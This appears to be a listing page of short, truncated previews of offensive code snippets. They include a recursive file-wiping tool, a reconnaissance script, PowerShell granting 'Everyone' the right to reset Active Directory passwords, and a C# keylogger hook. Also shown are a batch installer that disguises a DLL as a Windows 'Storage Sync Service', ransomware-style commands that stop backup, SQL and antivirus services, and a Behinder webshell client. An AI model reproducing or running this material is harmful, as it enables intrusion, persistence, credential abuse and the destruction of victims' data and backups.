.\wipe <directory>
will rewrite all files in a directory recursively
#!/bin/bash | |
df -aH | |
ip addr | |
netstat -tulpn | |
ps -aux | |
who -a | |
systemctl list-units --type=service --no-pager | |
service --status-all | |
apt list --installed |
import json | |
import docker | |
import os | |
import boto3 | |
import subprocess | |
TARGET_INSTANCE = "<instance ID>" | |
LOCAL_PORT = "9999" | |
REGION = "us-east-1" | |
PROFILE = "default" |
# get SID for "Everyone" principal | |
$sid = [Security.Principal.securityidentifier]::new([System.Security.Principal.WellKnownSidType]::WorldSid, $null) | |
$everyone = $sid.Translate([security.principal.ntaccount]) | |
# change user password permissions | |
$adRight=[DirectoryServices.ActiveDirectoryRights]"ExtendedRight" | |
$pguid = new-object GUID "ab721a53-1e2f-11d0-9819-00aa0040529b" # refer to https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb | |
# craft an ACE that grants "Everyone" "Allow" for changing user password | |
$accessRuleArgs = $everyone,$adRight,"Allow",$pguid,"None" |
using System; | |
using System.Diagnostics; | |
using System.Windows.Forms; | |
using System.Runtime.InteropServices; | |
using System.IO; | |
class InterceptKeys | |
{ | |
private const int WH_KEYBOARD_LL = 13; | |
private const int WM_KEYDOWN = 0x0100; |
@echo off | |
set "WORK_DIR=C:\Windows\System32" | |
set "DLL_NAME=storesyncsvc.dll" | |
set "SERVICE_NAME=StorSyncSvc" | |
set "DISPLAY_NAME=Storage Sync Service" | |
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly." | |
sc stop %SERVICE_NAME% | |
sc delete %SERVICE_NAME% | |
mkdir %WORK_DIR% | |
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y |
net1 stop samss /y | |
net1 stop veeamcatalogsvc /y | |
net1 stop veeamcloudsvc /y | |
net1 stop veeamdeploysvc /y | |
net.exe stop samss /y | |
net.exe stop veeamcatalogsvc /y | |
net.exe stop veeamcloudsvc /y | |
net.exe stop veeamdeploysvc /y | |
taskkill.exe /IM sqlbrowser.exe /F | |
taskkill.exe /IM sqlceip.exe /F |
# Behinder Webshell Clients | |
## php_cmd.py | |
Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar. |
net stop "Acronis VSS Provider" /y | |
net stop "Enterprise Client Service" /y | |
net stop "SQLsafe Backup Service" /y | |
net stop "SQLsafe Filter Service" /y | |
net stop "Veeam Backup Catalog Data Service" /y | |
net stop AcronisAgent /y | |
net stop AcrSch2Svc /y | |
net stop Antivirus /y | |
net stop ARSM /y | |
net stop BackupExecAgentAccelerator /y |
@echo off | |
setlocal enabledelayedexpansion | |
set "true=1" | |
:loop | |
if defined true ( | |
set /p c="%cd%> " | |
start !c! | |
set c= |